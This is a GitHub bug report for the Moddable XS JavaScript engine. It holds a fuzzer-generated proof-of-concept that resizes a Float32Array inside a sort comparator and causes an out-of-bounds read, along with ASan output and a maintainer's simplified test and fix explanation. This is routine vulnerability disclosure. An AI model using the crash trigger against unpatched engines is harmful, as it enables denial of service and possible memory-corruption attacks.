Moddable-OpenSource/moddable #749: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsDataView.c:2709:8 in fxFloat32Getter

eternalsakura, 2021-12-13:
# Build environment
- operating system: ubuntu20.04
- cimmit hash: db8f9735c20c07c189d7f4a0574e787d4a6669ea
- compile command:  
```
cd /pathto/moddable/xs/makefiles/lin
make debug or make release
```
- test command: 
```
export ASAN_OPTIONS=detect_leaks=0
./xst poc
```
# poc
```
var f32 = new Float32Array(127);
for (var n = 7; n; n--)
    f32["sort"](function (fuzz_v21, fuzz_v22, fuzz_v23) {
        f32.length = 2;
        var fuzz_v31 = [
            "4LZ3E",
            "__proto__"
        ];
        return n;
    });
```

# description
- asan log
```
=================================================================
==2234547==ERROR: AddressSanitizer: SEGV on unknown address 0x7f24423e0ffc (pc 0x000000530514 bp 0x7fff6c350510 sp 0x7fff6c3504e0 T0)
==2234547==The signal is caused by a READ memory access.
    #0 0x530514 in fxFloat32Getter /home/sakura/moddable/xs/sources/xsDataView.c:2709:8
    #1 0x5282e8 in fxCompareTypedArrayItem /home/sakura/moddable/xs/sources/xsDataView.c:1234:3
    #2 0x52f1aa in fx_TypedArray_prototype_sort /home/sakura/moddable/xs/sources/xsDataView.c:2303:14
    #3 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8
    #4 0x5b50e2 in fxRunScript /home/sakura/moddable/xs/sources/xsRun.c:4766:4
    #5 0x61567c in fxRunProgramFile /home/sakura/moddable/xs/tools/xst.c:1387:2
    #6 0x60fbef in main /home/sakura/moddable/xs/tools/xst.c:281:8
    #7 0x7f24489850b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x42e6bd in _start (/home/sakura/moddable/build/bin/lin/debug/xst+0x42e6bd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsDataView.c:2709:8 in fxFloat32Getter
==2234547==ABORTING
```

- release crash
```
[] ~/sk-afl-js/moddable_workdir <main> ~/moddable/build/bin/lin/release/xst fuzz_output/fuzzer1/crashes/id:000001,sig:06,src:017947,op:\(null\),pos:0.js
[2]    2205390 segmentation fault  ~/moddable/build/bin/lin/release/xst 
```

phoddie, 2021-12-13:
Simplified test:

```js
var f32 = new Float32Array(127);
f32.sort(function () {
	this.length = 2;
	return 1;
});
```

phoddie, 2021-12-21:
The bug was in all TypedArray instances when used with a nonsense/malicious comparison function. This had previously been fixed for `Array` but the change wasn't propagated to `TypedArray`. Thank you.

closed 2021-12-29 by phoddie